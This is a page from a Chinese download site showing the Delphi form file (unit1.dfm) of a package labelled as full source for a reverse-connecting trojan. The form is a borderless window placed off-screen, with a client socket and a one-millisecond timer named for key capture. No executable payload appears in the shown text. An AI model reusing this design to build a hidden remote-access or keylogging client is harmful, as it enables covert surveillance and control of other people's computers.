⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站

📄 unit1.dfm

📁 反弹木马设计全部源码Delphi源码
💻 DFM
字号:
object Form1: TForm1
  Left = 205
  Top = -200
  BorderStyle = bsNone
  Caption = 'Form1'
  ClientHeight = 68
  ClientWidth = 116
  Color = clBtnFace
  Font.Charset = DEFAULT_CHARSET
  Font.Color = clWindowText
  Font.Height = -11
  Font.Name = 'MS Sans Serif'
  Font.Style = []
  OldCreateOrder = False
  OnCloseQuery = FormCloseQuery
  OnCreate = FormCreate
  PixelsPerInch = 96
  TextHeight = 13
  object lb1: TListBox
    Left = 4
    Top = 4
    Width = 20
    Height = 20
    ItemHeight = 13
    TabOrder = 0
  end
  object M1: TMemo
    Left = 28
    Top = 4
    Width = 20
    Height = 20
    TabOrder = 1
  end
  object M2: TMemo
    Left = 52
    Top = 4
    Width = 20
    Height = 20
    TabOrder = 2
  end
  object DCB: TDriveComboBox
    Left = 92
    Top = 4
    Width = 20
    Height = 19
    TabOrder = 3
    OnChange = DCBChange
  end
  object TSLB: TListBox
    Left = 72
    Top = 4
    Width = 20
    Height = 20
    ItemHeight = 13
    TabOrder = 4
  end
  object cs: TClientSocket
    Active = False
    ClientType = ctNonBlocking
    Port = 0
    OnConnect = csConnect
    OnDisconnect = csDisconnect
    OnRead = csRead
    OnError = csError
    Left = 32
    Top = 4
  end
  object Timer1: TTimer
    Enabled = False
    OnTimer = Timer1Timer
    Left = 4
    Top = 4
  end
  object keyti: TTimer
    Enabled = False
    Interval = 1
    OnTimer = keytiTimer
    Left = 4
    Top = 32
  end
  object RECL: TTimer
    Interval = 50
    OnTimer = RECLTimer
    Left = 32
    Top = 32
  end
end

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -